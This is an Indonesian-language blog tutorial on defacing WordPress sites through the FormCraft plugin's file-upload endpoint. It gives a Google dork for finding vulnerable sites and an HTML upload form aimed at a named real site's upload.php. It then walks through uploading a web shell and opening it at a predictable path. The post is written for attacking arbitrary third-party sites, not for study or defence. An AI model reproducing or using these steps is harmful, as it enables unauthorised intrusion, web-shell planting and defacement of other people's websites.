Deface dengan Wordpress Plugins FormCraft

Assalamualaikum sobat bloggers :D gimana kabarnya? kalo saya sih alhamdulillah sehat :D
Kali ini saya mau share tutorial deface dengan Wordpress Plugins FormCraft, ok langsung saja disimak ;)

Bahan - Bahan :

- Shell ( cari di google :p )
- CSRF

Script CSRF  :

<form method="POST" action="http://buildfire.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Save dengan Ekstensi HTML ! contoh : csrf.html


Langkah - Langkah :

1. Buka www.google.com, lalu masukan dork berikut :
     inurl:/wp-content/plugins/formcraft ( Kembangin lagi ;) )

2. Lalu pilih salah satu sitenya
3. Kalo sudah menemukan sitenya, masukan exploit berikut :  
    /wp-content/plugins/formcraft/file-upload/server/php/upload.php
4. Jika vuln, akan seperti ini :

5. Langkah selanjutnya adalah membuka CSRFnya :D
6. Copy sitenya dan paste di CSRF

7. Save, dan buka CSRFnya lalu Upload shell kita ;)
    * Jika tidak punya shell, cari terlebih dahulu di google, lalu download :D :p
8. Jika sukses meng upload shell, akan seperti ini :

 9. Setelah shell berhasil ke upload, tinggal dibuka deh =))

     Tempat akses shellnya disini :
     localhost/wp-content/plugins/formcraft/file-upload/server/php/files/-namashell.php
      * Kadang shell juga berupa random, kayak gini '' 154897dc834ecb---aleale.php '' 

     contoh :
    localhost/wp-content/plugins/formcraft/file-upload/server/php/files/154897dc834ecb---aleale.php
    

Sekian tutornya dan salam ganteng, Wassalamualaikum wr.wb :D


Jika kurang jelas, chat aja ke fb saya ;)  ( Klik here )